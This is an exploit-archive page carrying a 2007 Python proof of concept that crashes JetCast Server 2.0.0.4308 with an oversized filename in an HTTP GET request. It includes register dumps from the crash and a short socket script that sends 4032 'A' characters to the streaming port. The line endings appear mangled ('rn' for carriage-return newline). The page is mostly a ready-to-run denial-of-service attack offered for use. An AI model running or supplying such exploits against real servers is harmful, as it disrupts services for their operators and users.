JetCast Server 2.0.0.4308 Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : JetCast Server 2.0.0.4308 Remote Denial of Service Exploit
# Published : 2007-09-13
# Author : vCore
# Previous Title : Airsensor M520 HTTPD Remote Preauth DoS / BOF PoC
# Next Title : BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoCs

#!/usr/bin/python
"""     ____
__   __/ ___|___  _ __ ___
  / / |   / _ | '__/ _ 
  V /| |__| (_) | | |  __/
 _/  _______/|_|  ___|     _
 _ __  _ __ ___  ___  ___ _ __ | |_ ___   _
| '_ | '__/ _ / __|/ _  '_ | __/ __| |_|
| |_) | | |  __/__   __/ | | | |___   _
| .__/|_|  ___||___/___|_| |_|__|___/ |_|
|_|        _
      _  //
      \//
GENRE: //\PLOIT
     //  `
PROGRAM: JetCast Server 2.0.0.4308
EXPLOiT TYPE: 0day remote DoS exploit
EXPLOiT LANGUAGE: Python
DEBUG iNFO: [Module JSMP3OGG]
           EAX 100355B8 JSMP3OGG.100355B8
           ECX 00000007
           EDX 00002000
           EBX 00CB415A
           ESP 00DCDEC0
           EBP 00DCDECC
           ESI 00000000
           EDI 1002FA64 ASCII "Mozilla"
           EIP 1002737C JSMP3OGG.1002737C

           MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION)

Bug found / exploit written by vCore <share0005@o2.pl>
Tested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2
 ____          _
 / ___|_     __| | ___   _
| |   / _  / _` |/ _  |_|
| |__| (_) | (_| |  __/  _
 _______/ __,_|___| |_|

"""
from time import sleep
from socket import *

target = '127.0.0.1'
port = 8000
buf = "A" * 4032

header = (
   'GET /%s.mp3 HTTP/1.0rn'
   'Host: %srn'
   'User-Agent: WinampMPEG/5.19rn'
   'Accept: */*rn'
   'Icy-MetaData:1rn'
   'Connection: closern') % (buf, target)

s = socket(AF_INET, SOCK_STREAM)
s.connect((target, port))
s.send(header)
sleep(2)
s.close()

print "DONE"

# www.Syue.com [2007-09-13]